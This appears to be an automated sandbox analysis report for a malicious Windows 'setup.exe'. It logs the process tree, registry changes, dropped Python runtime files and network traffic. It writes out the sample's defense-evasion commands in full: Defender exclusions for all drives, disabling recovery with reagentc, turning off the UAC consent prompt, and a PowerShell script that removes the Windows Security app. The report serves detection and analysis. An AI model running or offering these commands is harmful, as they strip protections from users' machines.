| File name: | setup.exe |
| Full analysis: | https://app.any.run/tasks/72922da6-c762-476f-8cf1-a46cb4bb98ef |
| Verdict: | Malicious activity |
| Analysis date: | June 18, 2025, 07:05:05 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.microsoft.portable-executable |
| File info: | PE32+ executable (GUI) x86-64, for MS Windows, 7 sections |
| MD5: | FD100EC6F3DD7FC22BE320A984E1AA7D |
| SHA1: | 2DD31BF4813DC0E273FA5210C442D68876002F28 |
| SHA256: | F16DF2BC688EE1E31CFD4040DED359006C73092FDC310FBD7A9BA4C023085CCC |
| SSDEEP: | 98304:SShDa+jhZu8M4HmOVWjtKxgADpN25hAp42NAOQmMYS32afU9tto10wFsBRAbYpBL:4Xwa8YCp3pIwuuT |
| .exe | | | Win64 Executable (generic) (87.3) |
|---|---|---|
| .exe | | | Generic Win/DOS Executable (6.3) |
| .exe | | | DOS Executable Generic (6.3) |
| MachineType: | AMD AMD64 |
|---|---|
| TimeStamp: | 2025:01:11 16:20:26+00:00 |
| ImageFileCharacteristics: | Executable, Large address aware |
| PEType: | PE32+ |
| LinkerVersion: | 14.35 |
| CodeSize: | 171008 |
| InitializedDataSize: | 94208 |
| UninitializedDataSize: | - |
| EntryPoint: | 0xc200 |
| OSVersion: | 5.2 |
| ImageVersion: | - |
| SubsystemVersion: | 5.2 |
| Subsystem: | Windows GUI |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 516 | C:\Users\admin\AppData\Local\Temp\2AC36299-DBC6-4FE7-A826-7F680687F7F8\dismhost.exe {6208CEE4-A346-4463-A0A2-11D8B0143406} | C:\Users\admin\AppData\Local\Temp\2AC36299-DBC6-4FE7-A826-7F680687F7F8\DismHost.exe | Dism.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Dism Host Servicing Process Exit code: 0 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1056 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1204 | powershell -Command "reagentc /disable" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | setup.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1332 | "C:\WINDOWS\system32\Dism.exe" /online /set-nonremovableapppolicy /packagefamily:Microsoft.Windows.SecHealthUI_cw5n1h2txyewy /nonremovable:0 | C:\Windows\System32\Dism.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Dism Image Servicing Utility Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1760 | "C:\Users\admin\AppData\Local\Temp\setup.exe" | C:\Users\admin\AppData\Local\Temp\setup.exe | powershell.exe | ||||||||||||
User: admin Integrity Level: HIGH Exit code: 0 Modules
| |||||||||||||||
| 2032 | powershell -Command "foreach ($driveLetter in 'C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') { Add-MpPreference -ExclusionPath ${driveLetter}:\ -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess ${driveLetter}:\* -ErrorAction SilentlyContinue }" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | setup.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2524 | "C:\WINDOWS\system32\ReAgentc.exe" /disable | C:\Windows\System32\ReAgentc.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Microsoft Windows Recovery Agent Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2804 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2976 | C:\Users\admin\AppData\Local\Temp\2442E812-11B8-4A7E-B098-3A49940762EC\dismhost.exe {35EF2486-0F11-4941-BC95-2D091FBEE8BF} | C:\Users\admin\AppData\Local\Temp\2442E812-11B8-4A7E-B098-3A49940762EC\DismHost.exe | Dism.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Dism Host Servicing Process Exit code: 0 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3092 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (6980) reg.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications |
| Operation: | write | Name: | ToastEnabled |
Value: 0 | |||
| (PID) Process: | (6004) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System |
| Operation: | write | Name: | ConsentPromptBehaviorAdmin |
Value: 0 | |||
| (PID) Process: | (3588) DismHost.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Appx\EnterpriseUninstallBlockList |
| Operation: | delete value | Name: | Microsoft.Windows.SecHealthUI_cw5n1h2txyewy |
Value: | |||
| (PID) Process: | (6404) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deprovisioned\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (2976) DismHost.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Appx\EnterpriseUninstallBlockList |
| Operation: | delete value | Name: | Microsoft.Windows.SecHealthUI_cw5n1h2txyewy |
Value: | |||
| (PID) Process: | (516) DismHost.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Appx\EnterpriseUninstallBlockList |
| Operation: | delete value | Name: | Microsoft.Windows.SecHealthUI_cw5n1h2txyewy |
Value: | |||
| (PID) Process: | (2524) ReAgentc.exe | Key: | HKEY_LOCAL_MACHINE\BCD00000000\Objects\{9dea862c-5cdd-4e70-acc1-f32b344d4795}\Elements\11000001 |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (2524) ReAgentc.exe | Key: | HKEY_LOCAL_MACHINE\BCD00000000\Objects\{9dea862c-5cdd-4e70-acc1-f32b344d4795}\Elements\11000001 |
| Operation: | write | Name: | Element |
Value: 0000000000000000000000000000000006000000000000004800000000000000715E5C2FA985EB1190A89A9B763584210000000000000000745E5C2FA985EB1190A89A9B7635842100000000000000000000000000000000 | |||
| (PID) Process: | (2524) ReAgentc.exe | Key: | HKEY_LOCAL_MACHINE\BCD00000000\Objects\{9dea862c-5cdd-4e70-acc1-f32b344d4795}\Elements\12000002 |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (2524) ReAgentc.exe | Key: | HKEY_LOCAL_MACHINE\BCD00000000\Objects\{9dea862c-5cdd-4e70-acc1-f32b344d4795}\Elements\12000002 |
| Operation: | write | Name: | Element |
Value: \EFI\Microsoft\Boot\bootmgfw.efi | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 6852 | setup.exe | C:\Users\admin\AppData\Local\Temp\_MEI68522\VCRUNTIME140.dll | executable | |
MD5:F34EB034AA4A9735218686590CBA2E8B | SHA256:9D2B40F0395CC5D1B4D5EA17B84970C29971D448C37104676DB577586D4AD1B1 | |||
| 6852 | setup.exe | C:\Users\admin\AppData\Local\Temp\_MEI68522\_asyncio.pyd | executable | |
MD5:33D0B6DE555DDBBBD5CA229BFA91C329 | SHA256:A9A99A2B847E46C0EFCE7FCFEFD27F4BCE58BAF9207277C17BFFD09EF4D274E5 | |||
| 6852 | setup.exe | C:\Users\admin\AppData\Local\Temp\_MEI68522\_hashlib.pyd | executable | |
MD5:D4674750C732F0DB4C4DD6A83A9124FE | SHA256:CAA4D2F8795E9A55E128409CC016E2CC5C694CB026D7058FC561E4DD131ED1C9 | |||
| 6852 | setup.exe | C:\Users\admin\AppData\Local\Temp\_MEI68522\_multiprocessing.pyd | executable | |
MD5:A9A0588711147E01EED59BE23C7944A9 | SHA256:7581EDEA33C1DB0A49B8361E51E6291688601640E57D75909FB2007B2104FA4C | |||
| 6852 | setup.exe | C:\Users\admin\AppData\Local\Temp\_MEI68522\_ctypes.pyd | executable | |
MD5:1635A0C5A72DF5AE64072CBB0065AEBE | SHA256:1EA3DD3DF393FA9B27BF6595BE4AC859064CD8EF9908A12378A6021BBA1CB177 | |||
| 6852 | setup.exe | C:\Users\admin\AppData\Local\Temp\_MEI68522\_bz2.pyd | executable | |
MD5:86D1B2A9070CD7D52124126A357FF067 | SHA256:62173A8FADD4BF4DD71AB89EA718754AA31620244372F0C5BBBAE102E641A60E | |||
| 6852 | setup.exe | C:\Users\admin\AppData\Local\Temp\_MEI68522\_decimal.pyd | executable | |
MD5:20C77203DDF9FF2FF96D6D11DEA2EDCF | SHA256:9AAC010A424C757C434C460C3C0A6515D7720966AB64BAD667539282A17B4133 | |||
| 6852 | setup.exe | C:\Users\admin\AppData\Local\Temp\_MEI68522\api-ms-win-core-datetime-l1-1-0.dll | executable | |
MD5:DCAE341BA54F008862B979808FA03076 | SHA256:24EFF95E03E5F29590D5ABA746171AD61F3E70A85ED2B1D7DB22BA21DC418E10 | |||
| 6852 | setup.exe | C:\Users\admin\AppData\Local\Temp\_MEI68522\api-ms-win-core-console-l1-1-0.dll | executable | |
MD5:E075B4FD5BDC7BA20F82E9EFA5D29044 | SHA256:AB7BFF07CED56AB79895F7749F5DBA20BE8DBC8370B373D9B98178DF99B91854 | |||
| 6852 | setup.exe | C:\Users\admin\AppData\Local\Temp\_MEI68522\api-ms-win-core-debug-l1-1-0.dll | executable | |
MD5:40877B3395DD815C524062B6E1360755 | SHA256:B6D1B07F5722C566C6E97E30012DFA5EA7E2307468BA5A466EEF6D6F0051BF47 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2120 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
2120 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
1268 | svchost.exe | GET | 200 | 2.16.241.12:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
2940 | svchost.exe | GET | 200 | 23.209.209.135:80 | http://x1.c.lencr.org/ | unknown | — | — | whitelisted |
3768 | svchost.exe | GET | 200 | 2.23.77.188:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
1268 | svchost.exe | GET | 200 | 2.23.246.101:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
5944 | MoUsoCoreWorker.exe | 20.73.194.208:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
1268 | svchost.exe | 20.73.194.208:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
6936 | RUXIMICS.exe | 20.73.194.208:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
1268 | svchost.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
1268 | svchost.exe | 2.16.241.12:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
1268 | svchost.exe | 2.23.246.101:80 | www.microsoft.com | Ooredoo Q.S.C. | QA | whitelisted |
5944 | MoUsoCoreWorker.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
2120 | SIHClient.exe | 20.109.210.53:443 | slscr.update.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
Domain | IP | Reputation |
|---|---|---|
google.com |
| whitelisted |
settings-win.data.microsoft.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |
login.live.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
client.wns.windows.com |
| whitelisted |
activation-v2.sls.microsoft.com |
| whitelisted |
Process | Message |
|---|---|
powershell.exe | PID=6404 TID=5504 DismApi.dll: <----- Starting DismApi.dll session -----> - DismInitializeInternal
|
powershell.exe | PID=6404 TID=5504 Initialized GlobalConfig - DismInitializeInternal
|
powershell.exe | PID=6404 TID=5504 DismApi.dll: Host machine information: OS Version=10.0.19045, Running architecture=amd64, Number of processors=4 - DismInitializeInternal
|
powershell.exe | PID=6404 TID=5504 Enter DismInitializeInternal - DismInitializeInternal
|
powershell.exe | PID=6404 TID=5504 DismApi.dll: Parent process command line: powershell -Command "
$remove_appx = @(\"SecHealthUI\")
$provisioned = Get-AppxProvisionedPackage -Online
$appxpackage = Get-AppxPackage -AllUsers
$eol = @()
$store = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore'
$users = @('S-1-5-18')
if (Test-Path $store) {
$users += $((Get-ChildItem $store -ea 0 | Where-Object { $_ -like '*S-1-5-21*' }).PSChildName)
}
foreach ($choice in $remove_appx) {
if ('' -eq $choice.Trim()) {
continue
}
foreach ($appx in $($provisioned | Where-Object { $_.PackageName -like \"*$choice*\" })) {
$PackageName = $appx.PackageName
$PackageFamilyName = ($appxpackage | Where-Object { $_.Name -eq $appx.DisplayName }).PackageFamilyName
New-Item -Path \"$store\Deprovisioned\$PackageFamilyName\" -Force | Out-Null
foreach ($sid in $users) {
New-Item -Path \"$store\EndOfLife\$sid\$PackageName\" -Force | Out-Null
}
$eol += $PackageName
dism /online /set-nonremovableapppolicy /packagefamily:$PackageFamilyName /nonremovable:0 | Out-Null
Remove-AppxProvisionedPackage -PackageName $PackageName -Online -AllUsers | Out-Null
}
foreach ($appx in $($appxpackage | Where-Object { $_.PackageFullName -like \"*$choice*\" })) {
$PackageFullName = $appx.PackageFullName
New-Item -Path \"$store\Deprovisioned\$($appx.PackageFamilyName)\" -Force | Out-Null
foreach ($sid in $users) {
New-Item -Path \"$store\EndOfLife\$sid\$PackageFullName\" -Force | Out-Null
}
$eol += $PackageFullName
dism /online /set-nonremovableapppolicy /packagefamily:$($appx.PackageFamilyName) /nonremovable:0 | Out-Null
Remove-AppxPackage -Package $PackageFullName -AllUsers | Out-Null
}
}
" - DismInitializeInternal
|
powershell.exe | PID=6404 TID=5504 Lookup in table by path failed for: DummyPath-2BA51B78-C7F7-4910-B99D-BB7345357CDC - CTransactionalImageTable::LookupImagePath
|
powershell.exe | PID=6404 TID=5504 Initialized SessionTable - DismInitializeInternal
|
powershell.exe | PID=6404 TID=5504 Input parameters: LogLevel: 2, LogFilePath: C:\WINDOWS\Logs\DISM\dism.log, ScratchDirectory: (null) - DismInitializeInternal
|
powershell.exe | PID=6404 TID=5504 DismApi.dll: - DismInitializeInternal
|
powershell.exe | PID=6404 TID=5504 DismApi.dll: - DismInitializeInternal
|